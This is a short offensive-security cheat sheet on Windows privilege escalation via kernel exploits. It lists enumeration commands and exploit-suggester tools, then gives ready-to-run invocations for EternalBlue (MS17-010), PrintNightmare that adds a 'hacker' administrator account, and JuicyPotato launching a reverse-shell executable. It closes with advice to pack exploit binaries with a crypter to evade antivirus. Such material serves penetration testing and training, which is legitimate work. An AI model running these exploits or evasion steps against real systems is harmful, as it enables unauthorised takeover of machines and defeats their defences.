• Privilege Escalation
• Windows
• Shell
• Kernel Exploit

Escalate privileges via Windows kernel exploits. Enumerate system info to identify vulnerable OS/kernel versions and match against known exploits.

Shell

• # ============================================================
  # ENUMERATION — Gather system information
  # ============================================================
  
  # Full system information
  systeminfo
  
  # Quick summary of OS version and architecture
  systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
  
  # Check installed hotfixes/patches
  wmic qfe list brief
  
  # Save systeminfo output for offline analysis
  systeminfo > sysinfo.txt
  
  # ============================================================
  # AUTOMATED EXPLOIT SUGGESTION
  # ============================================================
  
  # Windows Exploit Suggester - Next Generation (on attacker machine)
  # https://github.com/bitsadmin/wesng
  python3 wes.py sysinfo.txt
  
  # Or use Watson (run on target, .NET based)
  # https://github.com/rasta-mouse/Watson
  Watson.exe
  
  # ============================================================
  # COMMON KERNEL EXPLOITS
  # ============================================================
  
  # --- EternalBlue (MS17-010) — Windows 7 / Server 2008 R2 ---
  # NOTE: Popular exploits often only work for x64 (64-bit)
  # For 32-bit (x86) targets, use DoublePulsar + EternalBlue combo
  # https://github.com/worawit/MS17-010
  python3 eternalblue_exploit.py 10.10.10.27 shellcode_x64.bin
  
  # --- PrintNightmare (CVE-2021-1675 / CVE-2021-34527) ---
  # Works on many unpatched Windows versions
  # https://github.com/calebstewart/CVE-2021-1675
  # PowerShell: Import-Module .\CVE-2021-1675.ps1
  # Invoke-Nightmare -NewUser "hacker" -NewPassword "P@ssw0rd"
  
  # --- Hot Potato / Rotten Potato / Juicy Potato ---
  # Use JuicyPotato for modern Windows (requires SeImpersonatePrivilege)
  # https://github.com/ohpe/juicy-potato
  JuicyPotato.exe -l 1337 -p C:\Temp\rev.exe -t *
  
  # --- NOTE: AV evasion ---
  # If antivirus is blocking exploits, consider using a crypter
  # to pack the exploit binary before transferring to target
  # Check softpedia.com or exploit-db.com for CVE details
  

References:

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/bitsadmin/wesng